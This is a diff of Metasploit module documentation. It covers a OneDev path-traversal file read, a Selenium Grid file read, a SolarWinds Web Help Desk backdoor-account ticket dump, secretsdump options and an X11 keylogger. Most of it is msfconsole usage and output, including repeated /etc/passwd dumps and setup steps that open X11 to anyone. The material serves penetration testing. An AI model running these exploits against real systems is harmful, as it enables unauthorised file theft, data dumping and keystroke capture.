+```
@@ -9,7 +9,9 @@ along with info about which vulnerable certificate templates the certificate ser
 allows enrollment in and which SIDs are authorized to use that certificate server to
 perform this enrollment operation.

-Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
+Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13,
+and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from
+a normal user account by analyzing the objects in LDAP.

 ### Installing AD CS
 1. Install AD CS on either a new or existing domain controller
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+OneDev is a Git Server with CI/CD, kanban, and packages.
+This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8.
+This vulnerability arises due to the lack of user-input sanitization of path traversal sequences `..` in the `ProjectBlobPage.java` file.
+
+To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor
+can view existing projects without authentication.
+However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach.
+By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
+
+## Installation
+
+OneDev provides docker images for a quick setup process.
+A vulnerable version (`v11.0.8`) can be found [here](https://hub.docker.com/r/1dev/server/tags?name=11.0.8).
+
+Installation instructions can be found [here](https://docs.onedev.io/).
+
+## Verification Steps
+
+1. Install the OneDev application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/onedev_arbitrary_file_read`
+4. Set the `RHOSTS` and `RPORT` options as necessary
+5. Set the `TARGETFILE` option with the absolute path of the target file to read
+
+If a valid project name is known:
+
+6. Set the `PROJECT_NAME` option with the known project name
+7. Do: `run`
+8. If the file exists, the contents will be displayed to the user
+
+If there is no information about existing projects:
+
+6. Set the `PROJECT_NAMES_FILE` option with the absolute path of a wordlist that contains multiple possible values for a valid project name
+7. Do: `run`
+8. If a valid project name is found, the target file contents will be displayed to the user
+
+## Options
+
+### PROJECT_NAME
+A valid OneDev project name is required to exploit the vulnerability. If anonymous access is enabled on the OneDev server,
+any visitor can see the existing projects, and collect a valid project name. On the other hand, if anonymous access is disabled,
+the user needs to have previous knowledge of a valid project name or use the `PROJECT_NAMES_FILE` option to find one through brute force.
+
+### PROJECT_NAMES_FILE
+Absolute path of a wordlist containing multiple possible values for valid project names. Once this option is set,
+the module will verify whether a given project exists for each word.
+
+
+### TARGETFILE
+Absolute file path of the target file to be retrieved from the OneDev server. Set as `/etc/passwd` by default.
+
+### STORE_LOOT
+If set as `true`, the target file contents will be stored as loot. Set as `false` by default.
+
+
+## Scenarios
+
+### Example: Known project name or anonymous access enabled on OneDev 11.0.8
+
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAME myproject
+PROJECT_NAME => myproject
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
+
+### Example: Unknown projects with anonymous access disabled on OneDev 11.0.8
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAMES_FILE /home/server/wordlist.txt
+PROJECT_NAMES_FILE => /home/server/wordlist.txt
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[*] Brute forcing valid project name ...
+[+] 192.168.1.10:6610 - Found valid OneDev project name: myproject
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,299 @@
+## Vulnerable Application
+
+If there is an open selenium web driver, a remote attacker can send requests to the victims browser.
+In certain cases this can be used to access to the remote file system.
+
+The vulnerability affects:
+
+    * all version of open Selenium Server (Grid)
+
+This module was successfully tested on:
+
+    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+
+
+### Installation
+
+1. `docker pull selenium/standalone-firefox:3.141.59`
+
+2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/selenium_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get a file content
+
+
+## Options
+
+### SCHEME (Required)
+
+This is the scheme to use. Default is `file`.
+
+### FILEPATH (Required)
+
+This is the file to read. Default is `/etc/passwd`.
+
+### BROWSER (Required)
+
+This is the browser to use. Default is `firefox`.
+
+### TIMEOUT (required)
+
+This is the amount of time (in seconds) that the module will wait for the payload to be
+executed. Defaults to 75 seconds.
+
+
+## Scenarios
+### selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+```
+msf6 > use auxiliary/gather/selenium_file_read
+msf6 auxiliary(gather/selenium_file_read) > options
+
+Module options (auxiliary/gather/selenium_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BROWSER   firefox          yes       The browser to use (Accepted: firefox, chrome, MicrosoftEdge)
+   FILEPATH  /etc/passwd      yes       File to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     4444             yes       The target port (TCP)
+   SCHEME    file             yes       The scheme to use
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   TIMEOUT   75               yes       Timeout for exploit (seconds)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4445
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.141.59 detected
+[*] Started session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4446
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (eb790e48-318a-4949-a7ff-8566f181a609).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+rtkit:x:104:105:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:105:106:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (eb790e48-318a-4949-a7ff-8566f181a609). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4447
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (2b4d313e-6e42-4c33-8bc8-630103269ef7).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (2b4d313e-6e42-4c33-8bc8-630103269ef7). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (599a7d03-1eca-41f3-8726-3a192104dfc1).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (599a7d03-1eca-41f3-8726-3a192104dfc1). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4453 BROWSER=chrome
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (363b104ba9d167f434518d3eb1add0c6).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (363b104ba9d167f434518d3eb1add0c6).
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4454 BROWSER=MicrosoftEdge
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 (CVE-2024-28987) to retrieve all tickets from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://downloads.solarwinds.com/solarwinds/Release/WebHelpDesk/12.8.1/WebHelpDesk-12.8.1-x64_eval.exe).
+
+Installation instructions are available [here]
+(https://documentation.solarwinds.com/en/success_center/whd/content/whd_installation_guide.htm).
+
+**Successfully tested on**
+
+- SolarWinds Web Help Desk v12.8.1 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/solarwinds_webhelpdesk_backdoor 
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > set RHOSTS <IP>
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+```
+
+This should return all the tickets from the Web Help Desk platform.
+
+## Options
+
+### TICKET_COUNT
+The number of tickets to dump to the terminal.
+
+## Scenarios
+
+Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+[*] Running module against 192.168.217.145
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
+[+] Successfully authenticated and tickets retrieved. Displaying the first 2 tickets retrieved:
+[+] [
+  {
+    "id": 2,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T08:54:13Z",
+    "shortSubject": "Password reset",
+    "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
+    "displayClient": "No Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "13 hours ago",
+    "latestNote": null
+  },
+  {
+    "id": 1,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T05:15:17Z",
+    "shortSubject": "Welcome to Web Help Desk",
+    "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
+    "displayClient": "Demo Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "17 hours ago",
+    "latestNote": null
+  }
+]
+[+] Saved 2 tickets to /home/asdf/.msf4/loot/20240926004744_default_unknown_solarwinds_webhe_825328.txt
+[*] Auxiliary module execution completed
+```
@@ -27,7 +27,7 @@ Solino.
 ### Setup
 A privileged user is required to run this module, typically a local or domain
 Administrator. It has been tested against multiple Windows versions, from
-Windows XP/Server 2003 to Windows 10/Server version 2004.
+Windows XP/Server 2003 to Windows 10/Server version 2022.

 ## Verification Steps
 1. Start msfconsole
@@ -53,6 +53,18 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 Use inline technique to read protected keys from the registry remotely without
 saving the hives to disk (default: true).

+### KRB_USERS
+Restrict retrieving domain information to the users or groups specified. This
+is a comma-separated list of Active Directory groups and users. This parameter
+is only utilised for domain replication (`action` set to `DOMAIN` or `ALL`).
+`set KRB_USERS "user1,user2,Domain Admins"
+
+### KRB_TYPES
+Restrict retrieving domain information to a specific type of account; either
+`USERS_ONLY` or `COMPUTERS_ONLY`, or `ALL` to retrieve all accounts. This
+parameter is only utilised for domain replication (`action` set to `DOMAIN` or
+`ALL`). It is ignored if `KRB_USERS` is also set.
+
 ## Actions

 ### ALL
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+This module binds to an open X11 host to log keystrokes. The X11 service can accept
+connections from any users when misconfigured with the command `xhost +`.
+This module is a close copy of the old xspy c program which has been on Kali for a long time.
+The module works by connecting to the X11 session, creating a background
+window, binding a keyboard to it and creating a notification alert when a key
+is pressed.
+
+One of the major limitations of xspy, and thus this module, is that it polls
+at a very fast rate, faster than a key being pressed is released (especially before
+the repeat delay is hit). To combat printing multiple characters for a single key
+press, repeat characters arent printed when typed in a very fast manor. This is also
+an imperfect keylogger in that keystrokes arent stored and forwarded but status
+displayed at poll time. Keys may be repeated or missing.
+
+### Ubuntu 10.04
+
+1. `sudo nano /etc/gdm/gdm.schemas`
+2. Find:
+
+    ```
+    <schema>
+     <key>security/DisallowTCP</key>
+     <signature>b</signature>
+     <default>true</default>
+    </schema>
+    ```
+  - Change `true` to `false`
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 12.04, 14.04
+
+1. `sudo nano /etc/lightdm/lightdm.conf`
+2. Under the `[SeatDefaults]` area, add:
+
+    ```
+    xserver-allow-tcp=true
+    allow-guest=true
+    ```
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```        	
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 16.04
+
+  Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
+
+### Fedora 15
+
+1. `vi /etc/gdm/custom.conf`
+2. Under the `[security]` area, add:
+
+    ```
+    DisallowTCP=false
+    ```
+
+3. logout/reboot
+4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Solaris 10
+
+1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
+2. `svc disable cde-login`
+3. `svc enable cde-login`
+4. `xhost +`
+
+### Ubuntu 22.04
+
+#### Server
+
+Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilitate instead.
+
+1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
+2. `sudo reboot` # prob a good idea since so much was installed
+3. `sudo xhost +` # must be done through gui, not through SSH
+4. `socat -d -d TCP-LISTEN:6000,fork,bind=<IP to listen to here> UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
+
+## Verification Steps
+
+1. Configure X11 to listen on port 6000, or use `socat` to open a socket.
+1. Start msfconsole
+1. Do: `use auxiliary/gather/x11_keyboard_spy`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should print keystrokes as they're pressed
+
+## Options
+
+### LISTENER_TIMEOUT
+
+How many seconds to keylog for.
+If set to `0`, wait forever. Defaults to `600`, 10 minutes.
+
+### PRINTERVAL
+
+The interval to print keylogs in seconds. Defaults to `60`.
+
+## Scenarios
+
+### Ubuntu 22.04
+
+```
+[*] Processing xspy.rb for ERB directives.
+resource (xspy.rb)> use auxiliary/gather/x11_keyboard_spy
+resource (xspy.rb)> set verbose true
+verbose => true
+resource (xspy.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/x11_keyboard_spy) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:6000 - Establishing TCP Connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
+[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data
+[+] 127.0.0.1:6000 - Successfully established X11 connection
+[*] 127.0.0.1:6000 - Version: 11.0
+[*] 127.0.0.1:6000 - Screen Resolution: 958x832
+[*] 127.0.0.1:6000 - Resource ID: 33554432
+[*] 127.0.0.1:6000 - Screen root: 1320
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
+[+] 127.0.0.1:6000 -   Extension BIG-REQUESTS is present with id 134
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
+[+] 127.0.0.1:6000 -   Extension XKEYBOARD is present with id 136
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
